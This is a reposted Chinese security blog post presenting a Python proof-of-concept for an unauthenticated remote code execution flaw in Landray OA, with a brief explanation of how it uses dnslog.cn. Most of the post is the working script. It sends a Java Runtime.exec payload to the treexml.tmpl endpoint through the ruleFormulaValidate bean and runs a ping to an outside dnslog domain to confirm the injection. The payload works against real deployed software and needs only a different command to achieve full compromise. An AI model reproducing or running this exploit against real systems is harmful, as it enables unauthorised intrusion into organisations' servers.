简单poc编写采用最近的蓝凌未授权rce（python）

简单poc编写采用最近的蓝凌未授权rce（python）
2022-8-7 15:47:25 Author: 红蓝攻防实验室(查看原文) 阅读量:167 收藏

这里我们借助burp的辅助工具去帮我们构造前期的请求包只需要专注逻辑处理

这里就可以用python对这个包发起请求

好了不废话上正文

蓝凌未授权rce poc

import argparseimport sysimport requestsimport timeimport random

def random_str(n):    str = ''    for i in range(n):        str += chr(random.randint(97, 122))    return str

cookie = random_str(26)headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1",           "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:100.0) Gecko/20000101 Firefox/100.0",           "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",           "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}

def get_domain_or_check(type):    if type == 1:        url = "http://www.dnslog.cn:80/getdomain.php"        cookies = {"PHPSESSID": cookie}        res = requests.get(url, headers=headers, cookies=cookies)        print("[+] dnslog:" + res.text)        return res.text    elif type == 2:        url = "http://dnslog.cn:80/getrecords.php?t=0.18836534176098696"        cookies = {"PHPSESSID": cookie}        time.sleep(0.8)        res = requests.get(url, headers=headers, cookies=cookies)        if len(res.text) > 2:            print("[+] Success 漏洞存在: " + res.text)        else:            print("[+] 漏洞不存在")

def test(url):    cmd = "ping " + get_domain_or_check(1)    headers = {        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36",        "Connection": "close", "Accept": "*/*", "Accept-Language": "en",        "Content-Type": "application/x-www-form-urlencoded", "Pragma": "no-cache", "Accept-Encoding": "gzip, deflate"}    data = {"s_bean": "ruleFormulaValidate", "script": "try {String cmd = \"" + str(        cmd) + "\";Process process = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);}"}    if url[-1] != "/":        url = url + "/data/sys-common/treexml.tmpl"    else:        url = url + "data/sys-common/treexml.tmpl"    res = requests.post(url, headers=headers, data=data)    if res.status_code == 200:        get_domain_or_check(2)    else:        print("[+] 状态码" + str(res.status_code) + " 漏洞不存在")

def parse_args():    parser = argparse.ArgumentParser(epilog="\tExample: \r\npython " + sys.argv[0] + " -u target")    parser._optionals.title = "OPTIONS"    parser.add_argument('-u', '--url', help="url.", required=True, type=str)
    return parser.parse_args()

if __name__ == '__main__':    print("\033[1;32mAuthor: by567 暗\033[0m")    args = parse_args()    url = args.url    test(url)

这里分析了 dnslog的getdomain.php和getrecords.php来获取dnslog测试结果

通过getdomain.php获取测试dnslog 这里PHPSESSID设置我们构造的这样获取结果才能获取到

接着就是发起请求对数据包进行分析处理

代码写的比较low 大佬勿喷

文章来源: http://mp.weixin.qq.com/s?__biz=MzU2OTkwNzIxOA==&mid=2247483952&idx=1&sn=019733f010b3e8ddc090a8285521fa59&chksm=fcf6c34dcb814a5b1274b5a6895e0b282abcd77993efb896fb00a0f2e89ae26fce9018ec6e1f#rd
如有侵权请联系:admin#unsafe.sh